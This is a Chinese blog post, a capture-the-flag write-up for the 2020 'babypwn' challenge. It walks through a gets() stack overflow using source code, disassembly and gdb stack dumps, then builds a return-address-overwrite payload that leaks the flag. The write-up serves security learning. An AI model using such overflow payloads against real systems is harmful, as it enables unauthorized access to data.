JohnLyu的blog

橙汁事务所艾欧泽亚分部

0%

cybersecurityrumble-2020-babypwn

简介

题目文件

Never done any kind of binary exploitation before? This should get you started. Grab some gdb or radare, turn off ASLR, forget about stack canaries, and let the fun begin.

检查文件状态:

1
2
3
4
5
6
7
[*] babypwn'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: PIE enabled
RWX: Has RWX segments

OK, 看起来十分的baby. no ASLK, no canaries. 甚至给出了源代码.

开启了PIE, 但是服务器没有开启ASLR.

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <assert.h>
#include <openssl/md5.h>

void calc_string_md5(char *string, char md5[MD5_DIGEST_LENGTH]) {
MD5_CTX c;
MD5_Init(&c);
MD5_Update(&c, string, strlen(string));
MD5_Final(md5, &c);
}

unsigned char char_to_repr(char in) {
if (in >= '0' && in <= '9')
return in - '0';
if (in >= 'a' && in <= 'f')
return in - 'a' + 0xa;
if (in >= 'A' && in <= 'F')
return in - 'A' + 0xa;
assert("not in hex digit range" && 0);
}

void hex_to_binary(char *in, unsigned char* out, size_t length) {
size_t i;
assert("length must be even" && (length % 2) == 0);

length /= 2;
for (i = 0; i < length; i++) {
out[i] = char_to_repr(in[i * 2]) << 4 | char_to_repr(in[i * 2 + 1]);
}
}

int check_user_hash(char* flag) {
unsigned char user_md5[MD5_DIGEST_LENGTH * 2 + 1];
unsigned char flag_md5[MD5_DIGEST_LENGTH];

/* calculate MD5("CSR{...}") */
calc_string_md5(flag, flag_md5);

/* read user input, convert to hexadecimal */
gets(user_md5);
hex_to_binary(user_md5, user_md5, strlen(user_md5));

return memcmp(flag_md5, user_md5, MD5_DIGEST_LENGTH) ? 0 : 1;
}

int main() {
char flag[0x500];
setvbuf(stdin, 0, _IONBF, 0);
setvbuf(stdout, 0, _IONBF, 0);
setvbuf(stderr, 0, _IONBF, 0);

/* read flag */
int fd = open("flag.txt", O_RDONLY);
assert("unable to open flag file" && fd >= 0);
flag[read(fd, flag, sizeof(flag))] = '\0';
close(fd);

puts("It's easy. Give me MD5($flag), get $flag in return.");

/* if md5 is correct, print flag */
if(check_user_hash(flag)) {
puts(flag);
} else {
puts("nope");
}

return 0;
}

初步判断是gets(user_md5);存在栈溢出.

反编译

查看其汇编:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
000000000000143e
; ================ B E G I N N I N G O F P R O C E D U R E ================

; Variables:
; var_68: int64_t, -104
; var_70: int64_t, -112
; var_78: int64_t, -120
; var_80: int64_t, -128


check_user_hash:
0000000000001440 push r12 ; Begin of unwind block (FDE at 0x220c), CODE XREF=main+145
0000000000001442 mov r12, rdi
0000000000001445 push rbp
0000000000001446 sub rsp, 0x78
000000000000144a lea rbp, qword [rsp+0x80+var_70]
000000000000144f mov rdi, rbp ; argument "c" for method j_MD5_Init
0000000000001452 call j_MD5_Init ; MD5_Init
0000000000001457 mov rdi, r12 ; argument "__s" for method j_strlen
000000000000145a call j_strlen ; strlen
000000000000145f mov rsi, r12 ; argument "data" for method j_MD5_Update
0000000000001462 mov rdi, rbp ; argument "c" for method j_MD5_Update
0000000000001465 mov rdx, rax ; argument "len" for method j_MD5_Update
0000000000001468 call j_MD5_Update ; MD5_Update
000000000000146d mov rsi, rbp ; argument "c" for method j_MD5_Final
0000000000001470 mov rdi, rsp ; argument "md" for method j_MD5_Final
0000000000001473 call j_MD5_Final ; MD5_Final
0000000000001478 mov rdi, rbp ; argument "__str" for method j_gets
000000000000147b call j_gets ; gets
0000000000001480 mov rdi, rbp ; argument "__s" for method j_strlen
0000000000001483 call j_strlen ; strlen
0000000000001488 mov rsi, rbp ; argument #2 for method hex_to_binary
000000000000148b mov rdi, rbp ; argument #1 for method hex_to_binary
000000000000148e mov rdx, rax ; argument #3 for method hex_to_binary
0000000000001491 call hex_to_binary ; hex_to_binary
0000000000001496 mov rdx, qword [rsp+0x80+var_78]
000000000000149b mov rax, qword [rsp+0x80+var_80]
000000000000149f xor rdx, qword [rsp+0x80+var_68]
00000000000014a4 xor rax, qword [rsp+0x80+var_70]
00000000000014a9 or rdx, rax
00000000000014ac sete al
00000000000014af add rsp, 0x78
00000000000014b3 movzx eax, al
00000000000014b6 pop rbp
00000000000014b7 pop r12
00000000000014b9 ret

动态调试

发现因为其大量使用rbp当临时变量, 导致对栈的静态分析很费力.

转到gdb动态调试看看.

将断点下在j_gets处.

可以看到此时的堆栈大概如图所示

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

0x555555555478 <check_user_hash+56> mov rdi, rbp
0x55555555547b <check_user_hash+59> call gets@plt <gets@plt>

0x555555555480 <check_user_hash+64> mov rdi, rbp
0x555555555483 <check_user_hash+67> call strlen@plt <strlen@plt>

0x555555555488 <check_user_hash+72> mov rsi, rbp
0x55555555548b <check_user_hash+75> mov rdi, rbp
0x55555555548e <check_user_hash+78> mov rdx, rax
0x555555555491 <check_user_hash+81> call hex_to_binary <hex_to_binary>

0x555555555496 <check_user_hash+86> mov rdx, qword ptr [rsp + 8]
0x55555555549b <check_user_hash+91> mov rax, qword ptr [rsp]
───────────────────────────────────────[ STACK ]────────────────────────────────────────
00:0000│ rdi rsp 0x7fffffffdcc0 ◂— 0xa /* '\n' */
01:00080x7fffffffdcc8 —▸ 0x5555555580a8 (stdout@@GLIBC_2.2.5) —▸ 0x7ffff7c3b7
60 (_IO_2_1_stdout_) ◂— xchg dword ptr [rax], ebp /* 0xfbad2887 */
02:0010│ rsi rbp 0x7fffffffdcd0 ◂— 0xefcdab8967452301
03:00180x7fffffffdcd8 ◂— 0x1032547698badcfe
04:00200x7fffffffdce0 ◂— 0xf8
05:00280x7fffffffdce8 ◂— 'CSR{this-is-not-the-real-flag}\n'
06:00300x7fffffffdcf0 ◂— '-is-not-the-real-flag}\n'
07:00380x7fffffffdcf8 ◂— 'the-real-flag}\n'
─────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────
► f 0 555555555473 check_user_hash+51
f 1 555555555176 main+150
f 2 7ffff7aa309b __libc_start_main+235
────────────────────────────────────────────────────────────────────────────────────────
pwndbg> stack 20
00:0000│ rdi rsp 0x7fffffffdcc0 ◂— 0xa /* '\n' */
01:00080x7fffffffdcc8 —▸ 0x5555555580a8 (stdout@@GLIBC_2.2.5) —▸ 0x7ffff7c3b7
60 (_IO_2_1_stdout_) ◂— xchg dword ptr [rax], ebp /* 0xfbad2887 */
02:0010│ rsi rbp 0x7fffffffdcd0 ◂— 0xefcdab8967452301
03:00180x7fffffffdcd8 ◂— 0x1032547698badcfe
04:00200x7fffffffdce0 ◂— 0xf8
05:00280x7fffffffdce8 ◂— 'CSR{this-is-not-the-real-flag}\n'
06:00300x7fffffffdcf0 ◂— '-is-not-the-real-flag}\n'
07:00380x7fffffffdcf8 ◂— 'the-real-flag}\n'
08:00400x7fffffffdd00 ◂— 0xa7d67616c662d /* '-flag}\n' */
09:00480x7fffffffdd08 ◂— 0x0
... ↓
0d:00680x7fffffffdd28 ◂— 0x1f
0e:00700x7fffffffdd30 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
0f:00780x7fffffffdd38 ◂— 0x3
10:00800x7fffffffdd40 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
11:00880x7fffffffdd48 —▸ 0x555555555176 (main+150) ◂— test eax, eax
12:0090│ r12 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
13:00980x7fffffffdd58 ◂— '-is-not-the-real-flag}\n'

而往下执行一步, 输入一个正常的md5, cea404648bf1504a431f48e2d7788d74, 再次观察堆栈:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
00:0000│ rsp      0x7fffffffdcc0 ◂— 0x1be3e93037b0d224
01:00080x7fffffffdcc8 ◂— 0x65eb4ac4ed908384
02:0010│ rax rbp 0x7fffffffdcd0 ◂— 'cea404648bf1504a431f48e2d7788d74'
03:00180x7fffffffdcd8 ◂— '8bf1504a431f48e2d7788d74'
04:00200x7fffffffdce0 ◂— '431f48e2d7788d74'
05:00280x7fffffffdce8 ◂— 'd7788d74'
06:00300x7fffffffdcf0 ◂— 0x0
... ↓
0e:00700x7fffffffdd30 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
0f:00780x7fffffffdd38 ◂— 0x3
10:00800x7fffffffdd40 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
11:00880x7fffffffdd48 —▸ 0x555555555176 (main+150) ◂— test eax, eax
12:0090│ r12 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
13:00980x7fffffffdd58 ◂— '-is-not-the-real-flag}\n'

很容易看到我们的输入是从当前的rbp的位置输入的. 因此可以计算出覆盖到ret位置:

1
0x7fffffffdd48 —▸ 0x555555555176 (main+150) ◂— test   eax, eax

所需要的偏移量.

分析

下一步是观察需要返回到哪个位置:

观察main函数的assembly:

1
2
3
4
                     loc_1193:
0000000000001193 mov rdi, r12 ; argument "__s" for method j_puts, CODE XREF=main+152
0000000000001196 call j_puts ; puts
000000000000119b jmp loc_1186

可以看到这一段就是成功返回flag的分支.

因为开启了PIE, 静态分析的地址不能直接用于爆破, 但是因为没有开启ASLR, 本地动态调试的地址可以拿来直接用.

确定ret的地址是0x555555555193.

接下来继续单步调试.

如果我们直接构建如下payload:

1
2
offset = 0x78
payload = b'a' * offset + p64(0x555555555193)

并不能正确输出flag.

因为:

  1. hex_to_binary 会检测输入字符串长度是否是偶数
  2. 打印的地址也被覆盖成b'aaaaaaaa'了.

首先解决问题1, 将payload的首位改成\0, 字符串长度就是0, 符合要求.

然后解决问题2, 回顾一下最开始的check_user_hash函数的结尾:

1
2
00000000000014b7         pop        r12
00000000000014b9 ret

ret之前最后一步是把上一行栈给pop到r12中, 而puts的参数正好是r12.

动态调试的结果也说明了这一点.

1
2
3
10:00800x7fffffffdd40 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
11:00880x7fffffffdd48 —▸ 0x555555555176 (main+150) ◂— test eax, eax
12:0090│ r12 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'

返回地址的上一行是flag的指针.

因此构建payload的时候需要保护这一行. 再次感谢关闭了ASLR, 因此我们无需通过各种泄露找到地址, 只需要把本地调试的地址写进payload中.

新的payload大是这样:

1
2
offset = 0x78
payload = b'\0' + b'a' * (offset - 1) + p64(0x7fffffffdd50) + p64(0x555555555193)

再次尝试, 依旧失败.

原因在于gets函数会给传递的string的最后自动增加一个\0

而不幸的是, ret的下一行就是储存flag字符串的栈. 因此会覆盖字符串的第一位, 进而导致puts打印出空.

幸而是64bit程序, 地址最高位本来就是0 (0x7fffffffdd50 只占据6个字节, 最高位是0) 而小端序的最高位在内存的高位, 字符串写入是从低到高, 自动添加的\0会符合地址中本就存在的\x00

构建出最后的payload

1
2
offset = 0x70
payload = b'\0' + b'a' * (offset - 1) + p64(0x7fffffffdd50) + p64(0x555555555193)[:-1]

然而, 这个payload依旧打不出flag, 因为服务器的libc和本地有不同.

不过这点小问题在两个地址上加一个偏移然后爆破就好了.